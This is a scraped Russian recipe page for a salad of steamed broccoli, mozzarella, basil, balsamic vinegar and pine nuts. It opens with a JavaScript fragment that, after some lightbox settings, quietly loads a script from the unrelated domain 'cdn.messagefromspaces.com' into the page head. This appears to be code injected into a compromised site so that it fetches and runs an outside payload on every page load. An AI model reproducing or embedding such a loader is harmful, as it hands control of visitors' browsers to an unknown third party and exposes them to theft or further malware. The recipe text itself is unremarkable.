, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Салат из брокколи с моцареллой


03_10_2012_223625Каким бы вкусным ни был салат с помидорами и моцареллой, но для многих это сочетание стало чересчур привычным и салатом «Капрезе» сегодня уже мало кого удивишь. Если вы любите моцареллу, но при этом желаете приготовить что-то новое и не совсем стандартное, предлагаю вам отведать несколько иное сочетание: моцареллу с брокколи.

 

Что и солько берем:

1. Брокколи - 1 кочан

2. Моцарелла - 400 г.

3. Базилик свежий — по вкусу

4. Бальзамический уксус густой и масло оливковое  - по вкусу

5. Орешки кедровые - 4 ст.л.

 

Готовим:

Брокколи разбираем на мелкие соцветия и готовим на пароварке около 5-7 минут, после чего остужаем до комнатной температуры. Моцареллу режем ломтиками и раскладываем на тарелке. Сверху выкладываем броколи, поливаем маслом и уксусом. Сверху посыпаем орешками.

На эту тему вы можете почитать:

Жареные овощи
Цветная капуста в яйце
Фаршированные яйца

Тэги: ,



Добавить комментарий